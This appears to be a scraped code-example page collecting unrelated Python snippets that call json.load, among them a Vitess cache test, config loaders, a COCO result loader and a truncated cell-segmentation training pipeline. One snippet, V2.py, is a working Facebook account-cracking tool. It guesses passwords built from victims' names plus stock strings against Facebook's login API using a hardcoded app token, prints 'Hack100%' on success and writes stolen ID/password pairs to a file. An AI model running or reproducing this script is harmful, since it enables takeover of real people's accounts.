    stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test']
    self.assertEqual(stats_dict['Misses'] - misses, 1, "This shouldn't have hit the cache")

    replica_tablet.vquery("select * from vt_insert_test where id=%d" % (id), path='test_keyspace/0')
    stats_dict = framework.MultiDict(json.load(urllib2.urlopen("http://%s/debug/table_stats" % replica_host)))['vt_insert_test']
    self.assertEqual(stats_dict['Hits'] - hits, 1, "This should have hit the cache")
コード例 #29
0
def read_attrs(glider_config_path, glider_name):
    # Load in configurations
    attrs = {}

    # Load institute global attributes
    global_attrs_path = (
        os.path.join(glider_config_path, "global_attributes.json")
    )
    with open(global_attrs_path, 'r') as f:
        attrs['global'] = json.load(f)

    # Load deployment attributes (including global attributes)
    deployment_attrs_path = (
        os.path.join(glider_config_path, glider_name,
                     "deployment.json")
    )
    with open(deployment_attrs_path, 'r') as f:
        attrs['deployment'] = json.load(f)

    # Load instruments
    instruments_attrs_path = (
        os.path.join(glider_config_path, glider_name,
                     "instruments.json")
    )
    with open(instruments_attrs_path, 'r') as f:
        attrs['instruments'] = json.load(f)

    # Fill in global attributes
    attrs['global'].update(attrs['deployment']['global_attributes'])

    return attrs
コード例 #30
0
ファイル: tools.py プロジェクト: CatherineH/proselint
def load_options():
    """Read various proselintrc files, allowing user overrides."""
    possible_defaults = (
        '/etc/proselintrc',
        os.path.join(proselint_path, '.proselintrc'),
    )
    options = {}
    has_overrides = False

    for filename in possible_defaults:
        try:
            options = json.load(open(filename))
            break
        except IOError:
            pass

    try:
        user_options = json.load(open(os.path.expanduser('~/.proselintrc')))
        has_overrides = True
    except IOError:
        pass

    if has_overrides:
        if 'max_errors' in user_options:
            options['max_errors'] = user_options['max_errors']
        if 'checks' in user_options:
            for (key, value) in user_options['checks'].items():
                try:
                    options['checks'][key] = value
                except KeyError:
                    pass

    return options
コード例 #31
0
ファイル: V2.py プロジェクト: Asim02/Tool-A
	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass #Dev:Asim_Ch
		try:													
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)												
			b = json.loads(a.text)												
			pass1 = b['first_name'] + b['last_name']												
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")												
			q = json.load(data)												
			if 'access_token' in q:												
				print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'											
				print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']											
				print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user											
				print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass1 + '\n'											
				oks.append(user+pass1)											
			else:												
				if 'www.facebook.com' in q["error_msg"]:											
					print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'										
					print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']										
					print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user										
					print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass1 + '\n'										
					cek = open("out/super_cp.txt", "a")										
					cek.write("ID:" +user+ " Pw:" +pass1+"\n")										
					cek.close()										
					cekpoint.append(user+pass1)										
				else:											
					pass2 = b['last_name']+'123'										
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")										
					q = json.load(data)										
					if 'access_token' in q:										
						print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'								
						print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']									
						print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user									
						print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass2 + '\n'									
						oks.append(user+pass2)									
					else:										
						if 'www.facebook.com' in q["error_msg"]:									
							print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'								
							print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']								
							print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user								
							print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass2 + '\n'								
							cek = open("out/super_cp.txt", "a")								
							cek.write("ID:" +user+ " Pw:" +pass2+"\n")								
							cek.close()								
							cekpoint.append(user+pass2)								
						else:									
							pass3 = b['first_name']+'786'								
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")								
							q = json.load(data)								
							if 'access_token' in q:								
								print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'						
								print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']							
								print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user							
								print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass3 + '\n'							
								oks.append(user+pass3)							
							else:								
								if 'www.facebook.com' in q["error_msg"]:							
									print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'						
									print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']						
									print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user						
									print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass3 + '\n'						
									cek = open("out/super_cp.txt", "a")						
									cek.write("ID:" +user+ " Pw:" +pass3+"\n")						
									cek.close()						
									cekpoint.append(user+pass3)						
								else:							
									pass4 = b['first_name']+'123'						
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")						
									q = json.load(data)						
									if 'access_token' in q:						
										print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'					
										print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']					
										print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user					
										print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass4 + '\n'					
										oks.append(user+pass4)					
									else:						
										if 'www.facebook.com' in q["error_msg"]:					
											print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'				
											print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']				
											print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user				
											print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass4 + '\n'				
											cek = open("out/super_cp.txt", "a")				
											cek.write("ID:" +user+ " Pw:" +pass4+"\n")				
											cek.close()				
											cekpoint.append(user+pass4)				
										else:					
															
											pass5 = '786786'				
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")				
											q = json.load(data)				
											if 'access_token' in q:				
												print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'			
												print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']			
												print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user			
												print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass5 + '\n'			
												oks.append(user+pass5)			
											else:				
												if 'www.facebook.com' in q["error_msg"]:			
													print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'		
													print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']		
													print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user		
													print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass5 + '\n'		
													cek = open("out/super_cp.txt", "a")		
													cek.write("ID:" +user+ " Pw:" +pass5+"\n")		
													cek.close()		
													cekpoint.append(user+pass5)		
												else:			
													pass6 = 'Pakistan'		
													data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")		
													q = json.load(data)		
													if 'access_token' in q:		
														print '\x1b[1;91m[  ✓  ] \x1b[1;91mHack100%💉'	
														print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m    : \x1b[1;91m' + b['name']	
														print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user	
														print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass6 + '\n'	
														oks.append(user+pass6)	
													else:		
														if 'www.facebook.com' in q["error_msg"]:	
															print '\x1b[1;95m[  ✖ ] \x1b[1;95mCeckpoint'
															print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m    : \x1b[1;95m' + b['name']
															print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m      : \x1b[1;95m' + user
															print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass6 + '\n'
															cek = open("out/super_cp.txt", "a")
															cek.write("ID:" +user+ " Pw:" +pass6+"\n")
															cek.close()
															cekpoint.append(user+pass6)

																	
															
		except:
			pass
コード例 #32
0
ファイル: coco.py プロジェクト: LeeJinSoo-BIN/2020.RCVWS
    def loadRes(self, resFile):
        """
        Load result file and return a result api object.
        :param   resFile (str)     : file name of result file
        :return: res (obj)         : result api object
        """
        res = COCO()
        res.dataset['images'] = [img for img in self.dataset['images']]

        print('Loading and preparing results...')
        tic = time.time()
        if type(resFile) == str or type(resFile) == unicode:
            anns = json.load(open(resFile))
        elif type(resFile) == np.ndarray:
            anns = self.loadNumpyAnnotations(resFile)
        else:
            anns = resFile
        assert type(anns) == list, 'results in not an array of objects'
        annsImgIds = [ann['image_id'] for ann in anns]

        assert set(annsImgIds) == (set(annsImgIds) & set(self.getImgIds())), \
               'Results do not correspond to current coco set'
        if 'caption' in anns[0]:
            imgIds = set([img['id'] for img in res.dataset['images']]) & set([ann['image_id'] for ann in anns])
            res.dataset['images'] = [img for img in res.dataset['images'] if img['id'] in imgIds]
            for id, ann in enumerate(anns):
                ann['id'] = id+1
        elif 'bbox' in anns[0] and not anns[0]['bbox'] == []:
            res.dataset['categories'] = copy.deepcopy(self.dataset['categories'])
            for id, ann in enumerate(anns):
                bb = ann['bbox']
                x1, x2, y1, y2 = [bb[0], bb[0]+bb[2], bb[1], bb[1]+bb[3]]
                if not 'segmentation' in ann:
                    ann['segmentation'] = [[x1, y1, x1, y2, x2, y2, x2, y1]]
                ann['area'] = bb[2]*bb[3]
                ann['height'] = bb[3]
                ann['id'] = id+1
                ann['iscrowd'] = 0
        elif 'segmentation' in anns[0]:
            res.dataset['categories'] = copy.deepcopy(self.dataset['categories'])
            for id, ann in enumerate(anns):
                # now only support compressed RLE format as segmentation results
                ann['area'] = maskUtils.area(ann['segmentation'])
                if not 'bbox' in ann:
                    ann['bbox'] = maskUtils.toBbox(ann['segmentation'])
                ann['id'] = id+1
                ann['iscrowd'] = 0
        elif 'keypoints' in anns[0]:
            res.dataset['categories'] = copy.deepcopy(self.dataset['categories'])
            for id, ann in enumerate(anns):
                s = ann['keypoints']
                x = s[0::3]
                y = s[1::3]
                x0,x1,y0,y1 = np.min(x), np.max(x), np.min(y), np.max(y)
                ann['area'] = (x1-x0)*(y1-y0)
                ann['id'] = id + 1
                ann['bbox'] = [x0,y0,x1-x0,y1-y0]
        print('DONE (t={:0.2f}s)'.format(time.time()- tic))

        res.dataset['annotations'] = anns
        res.createIndex()
        return res
コード例 #33
0
import os
import json

import sys
from utils import dict_product, iwt, generate_configs

with open("../src/MuJoCo.json") as f:
    BASE_CONFIG = json.load(f)

PARAMS = {
    "game": ["HalfCheetah-v2"],
    "mode": ["adv_ppo"],
    "out_dir": ["attack_lstm_atla_ppo_halfcheetah/agents"],
    "norm_rewards": ["returns"],
    "initialization": ["orthogonal"],
    "anneal_lr": [True, False],
    "ppo_lr_adam":
    [0.0],  # this disables policy learning and we run attacks only.
    "adv_clip_eps": [0.2, 0.4],
    "adv_entropy_coeff": [0.0, 1e-5, 3e-5, 1e-4, 3e-4, 1e-3],
    "adv_ppo_lr_adam": [1e-3, 3e-3, 1e-2],
    "adv_val_lr": [1e-4, 3e-4, 1e-3],
    "save_iters": [20],
    "train_steps": [488],
    "robust_ppo_eps": [0.15],  # used for attack
    "history_length": [100],
    "load_model": [
        "models/atla_release/ATLA-LSTM-PPO/model-lstm-atla-ppo-ppo-halfcheetah.model"
    ],  # models for attack
    "value_clipping": [True],
}
コード例 #34
0
ID = 'P'
date = '5_17_2019'
overwriteFlag = 1

date_obj = datetime.date.today()
date_str = "%s_%s_%s" % (date_obj.month, date_obj.day, date_obj.year)

table = "PreProcessingTable_{}_{}.json".format(ID, date)
TasksDir = Path.cwd() / 'TasksDir'
if not TasksDir.exists():
    sys.exit('Task directory not found.')

if (TasksDir / table).exists():
    with open(str(TasksDir / table), 'r') as f:
        task_table = json.load(f)

nJobs = len(task_table)
completed_table = "PreProcessingTable_{}_{}_Completed.json".format(ID, date)
if not (TasksDir / completed_table).exists() or overwriteFlag:
    table_c = {}
    jobs = np.arange(1, nJobs + 1)
    for t in jobs:
        table_c[str(t)] = 0
    table_c['table'] = table
    table_c['updated'] = date_str

    with open(str(TasksDir / completed_table), 'w') as f:
        json.dump(table_c, f, indent=4)
else:
    with open(str(TasksDir / completed_table), 'r') as f:
コード例 #35
0
ファイル: train_cell.py プロジェクト: lxmwust/CNNectome
def train_until(max_iteration, data_sources, input_shape, output_shape, dt_scaling_factor, loss_name):
    ArrayKey('RAW')
    ArrayKey('RAW_UP')
    ArrayKey('ALPHA_MASK')
    ArrayKey('GT_LABELS')
    ArrayKey('MASK')
    ArrayKey('MASK_UP')
    ArrayKey('GT_DIST_CENTROSOME')
    ArrayKey('GT_DIST_GOLGI')
    ArrayKey('GT_DIST_GOLGI_MEM')
    ArrayKey('GT_DIST_ER')
    ArrayKey('GT_DIST_ER_MEM')
    ArrayKey('GT_DIST_MVB')
    ArrayKey('GT_DIST_MVB_MEM')
    ArrayKey('GT_DIST_MITO')
    ArrayKey('GT_DIST_MITO_MEM')
    ArrayKey('GT_DIST_LYSOSOME')
    ArrayKey('GT_DIST_LYSOSOME_MEM')

    ArrayKey('PRED_DIST_CENTROSOME')
    ArrayKey('PRED_DIST_GOLGI')
    ArrayKey('PRED_DIST_GOLGI_MEM')
    ArrayKey('PRED_DIST_ER')
    ArrayKey('PRED_DIST_ER_MEM')
    ArrayKey('PRED_DIST_MVB')
    ArrayKey('PRED_DIST_MVB_MEM')
    ArrayKey('PRED_DIST_MITO')
    ArrayKey('PRED_DIST_MITO_MEM')
    ArrayKey('PRED_DIST_LYSOSOME')
    ArrayKey('PRED_DIST_LYSOSOME_MEM')

    ArrayKey('SCALE_CENTROSOME')
    ArrayKey('SCALE_GOLGI')
    ArrayKey('SCALE_GOLGI_MEM')
    ArrayKey('SCALE_ER')
    ArrayKey('SCALE_ER_MEM')
    ArrayKey('SCALE_MVB')
    ArrayKey('SCALE_MVB_MEM')
    ArrayKey('SCALE_MITO')
    ArrayKey('SCALE_MITO_MEM')
    ArrayKey('SCALE_LYSOSOME')
    ArrayKey('SCALE_LYSOSOME_MEM')

    data_providers = []
    data_dir = "/groups/saalfeld/saalfeldlab/larissa/data/cell/{0:}.n5"
    voxel_size_up = Coordinate((4, 4, 4))
    voxel_size_orig = Coordinate((8, 8, 8))
    input_size = Coordinate(input_shape) * voxel_size_orig
    output_size = Coordinate(output_shape) * voxel_size_orig

    if tf.train.latest_checkpoint('.'):
        trained_until = int(tf.train.latest_checkpoint('.').split('_')[-1])
        print('Resuming training from', trained_until)
    else:
        trained_until = 0
        print('Starting fresh training')
    for src in data_sources:
        n5_source = N5Source(
            os.path.join(data_dir.format(src)),
            datasets={
                ArrayKeys.RAW_UP: 'volumes/raw',
                ArrayKeys.GT_LABELS: 'volumes/labels/all',
                ArrayKeys.MASK_UP: 'volumes/mask'
            },
            array_specs={
                ArrayKeys.MASK_UP: ArraySpec(interpolatable=False)
            }
        )
        data_providers.append(n5_source)

    with open('net_io_names.json', 'r') as f:
        net_io_names = json.load(f)


    # specifiy which Arrays should be requested for each batch
    request = BatchRequest()
    request.add(ArrayKeys.RAW, input_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.RAW_UP, input_size, voxel_size=voxel_size_up)
    request.add(ArrayKeys.GT_LABELS, output_size,  voxel_size=voxel_size_up)
    request.add(ArrayKeys.MASK_UP, output_size, voxel_size=voxel_size_up)
    request.add(ArrayKeys.MASK, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_CENTROSOME, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_GOLGI, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_GOLGI_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_ER, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_ER_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_MVB, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_MVB_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_MITO, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_MITO_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_LYSOSOME, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.GT_DIST_LYSOSOME_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_CENTROSOME, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_GOLGI, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_GOLGI_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_ER, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_ER_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_MVB, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_MVB_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_MITO, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_MITO_MEM, output_size, voxel_size=voxel_size_orig)
    request.add(ArrayKeys.SCALE_LYSOSOME, output_size, voxel_size=voxel_size_orig)
    #request.add(ArrayKeys.SCALE_LYSOSOME_MEM, output_size, voxel_size=voxel_size_orig)


    # create a tuple of data sources, one for each HDF file
    data_sources = tuple(
        provider +
        Normalize(ArrayKeys.RAW_UP) + # ensures RAW is in float in [0, 1]

        # zero-pad provided RAW and MASK to be able to draw batches close to
        # the boundary of the available data
        # size more or less irrelevant as followed by Reject Node
        Pad(ArrayKeys.RAW_UP, None) +
        RandomLocation(min_masked=0.5, mask=ArrayKeys.MASK_UP) # chose a random location inside the provided arrays
        #Reject(ArrayKeys.MASK) # reject batches wich do contain less than 50% labelled data

        for provider in data_providers)

    snapshot_request = BatchRequest()
    snapshot_request.add(ArrayKeys.PRED_DIST_CENTROSOME, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_GOLGI, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_GOLGI_MEM, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_ER, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_ER_MEM, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_MVB, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_MVB_MEM, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_MITO, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_MITO_MEM, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_LYSOSOME, output_size)
    snapshot_request.add(ArrayKeys.PRED_DIST_LYSOSOME_MEM, output_size)
    train_pipeline = (
        data_sources +
        RandomProvider() +
        ElasticAugment((100, 100, 100), (10., 10., 10.), (0, math.pi/2.0),
                       prob_slip=0, prob_shift=0, max_misalign=0,
                       subsample=8) +
        SimpleAugment() +
        ElasticAugment((40, 1000, 1000), (10., 0., 0.), (0, 0), subsample=8) +
        IntensityAugment(ArrayKeys.RAW_UP, 0.9, 1.1, -0.1, 0.1) +
        IntensityScaleShift(ArrayKeys.RAW_UP, 2, -1) +
        ZeroOutConstSections(ArrayKeys.RAW_UP) +

        #GrowBoundary(steps=1) +
        #SplitAndRenumberSegmentationLabels() +
        #AddGtAffinities(malis.mknhood3d()) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_CENTROSOME,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=1, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_GOLGI,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(2, 11), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_GOLGI_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=11, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_ER,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(3, 10), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_ER_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=10, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_MVB,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(4, 9), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_MVB_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=9, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_MITO,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(5, 8), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_MITO_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=8, factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_LYSOSOME,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=(6, 7), factor=2
                    ) +
        AddDistance(label_array_key=ArrayKeys.GT_LABELS,
                    distance_array_key=ArrayKeys.GT_DIST_LYSOSOME_MEM,
                    normalize='tanh',
                    normalize_args=dt_scaling_factor,
                    label_id=7, factor=2
                    ) +
        DownSample(ArrayKeys.MASK_UP, 2, ArrayKeys.MASK) +

        BalanceByThreshold(ArrayKeys.GT_DIST_CENTROSOME, ArrayKeys.SCALE_CENTROSOME, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_GOLGI, ArrayKeys.SCALE_GOLGI, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_GOLGI_MEM, ArrayKeys.SCALE_GOLGI_MEM, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_ER, ArrayKeys.SCALE_ER, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_ER_MEM, ArrayKeys.SCALE_ER_MEM, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_MVB, ArrayKeys.SCALE_MVB, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_MVB_MEM, ArrayKeys.SCALE_MVB_MEM, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_MITO, ArrayKeys.SCALE_MITO, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_MITO_MEM, ArrayKeys.SCALE_MITO_MEM, mask=ArrayKeys.MASK) +
        BalanceByThreshold(ArrayKeys.GT_DIST_LYSOSOME, ArrayKeys.SCALE_LYSOSOME, mask=ArrayKeys.MASK) +
        #BalanceByThreshold(ArrayKeys.GT_DIST_LYSOSOME_MEM, ArrayKeys.SCALE_LYSOSOME_MEM, mask=ArrayKeys.MASK) +

        #BalanceByThreshold(
        #    labels=ArrayKeys.GT_DIST,
        #    scales= ArrayKeys.GT_SCALE) +
          #{
            #     ArrayKeys.GT_AFFINITIES: ArrayKeys.GT_SCALE
            # },
            # {
            #     ArrayKeys.GT_AFFINITIES: ArrayKeys.MASK
            # }) +
        DownSample(ArrayKeys.RAW_UP, 2, ArrayKeys.RAW) +
        PreCache(
            cache_size=40,
            num_workers=10)+

        Train(
            'build',
            optimizer=net_io_names['optimizer'],
            loss=net_io_names[loss_name],
            inputs={
                net_io_names['raw']: ArrayKeys.RAW,
                net_io_names['gt_centrosome']: ArrayKeys.GT_DIST_CENTROSOME,
                net_io_names['gt_golgi']: ArrayKeys.GT_DIST_GOLGI,
                net_io_names['gt_golgi_mem']: ArrayKeys.GT_DIST_GOLGI_MEM,
                net_io_names['gt_er']: ArrayKeys.GT_DIST_ER,
                net_io_names['gt_er_mem']: ArrayKeys.GT_DIST_ER_MEM,
                net_io_names['gt_mvb']: ArrayKeys.GT_DIST_MVB,
                net_io_names['gt_mvb_mem']: ArrayKeys.GT_DIST_MVB_MEM,
                net_io_names['gt_mito']: ArrayKeys.GT_DIST_MITO,
                net_io_names['gt_mito_mem']: ArrayKeys.GT_DIST_MITO_MEM,
                net_io_names['gt_lysosome']: ArrayKeys.GT_DIST_LYSOSOME,
                net_io_names['gt_lysosome_mem']: ArrayKeys.GT_DIST_LYSOSOME_MEM,
                net_io_names['w_centrosome']: ArrayKeys.SCALE_CENTROSOME,
                net_io_names['w_golgi']: ArrayKeys.SCALE_GOLGI,
                net_io_names['w_golgi_mem']: ArrayKeys.SCALE_GOLGI,
                net_io_names['w_er']: ArrayKeys.SCALE_ER,
                net_io_names['w_er_mem']: ArrayKeys.SCALE_ER,
                net_io_names['w_mvb']: ArrayKeys.SCALE_MVB,
                net_io_names['w_mvb_mem']: ArrayKeys.SCALE_MVB,
                net_io_names['w_mito']: ArrayKeys.SCALE_MITO,
                net_io_names['w_mito_mem']: ArrayKeys.SCALE_MITO,
                net_io_names['w_lysosome']: ArrayKeys.SCALE_LYSOSOME,
                net_io_names['w_lysosome_mem']: ArrayKeys.SCALE_LYSOSOME,
            },
            summary=net_io_names['summary'],
            log_dir='log',
            outputs={
                net_io_names['centrosome']: ArrayKeys.PRED_DIST_CENTROSOME,
                net_io_names['golgi']: ArrayKeys.PRED_DIST_GOLGI,
                net_io_names['golgi_mem']: ArrayKeys.PRED_DIST_GOLGI_MEM,
                net_io_names['er']: ArrayKeys.PRED_DIST_ER,
                net_io_names['er_mem']: ArrayKeys.PRED_DIST_ER_MEM,
                net_io_names['mvb']: ArrayKeys.PRED_DIST_MVB,
                net_io_names['mvb_mem']: ArrayKeys.PRED_DIST_MVB_MEM,
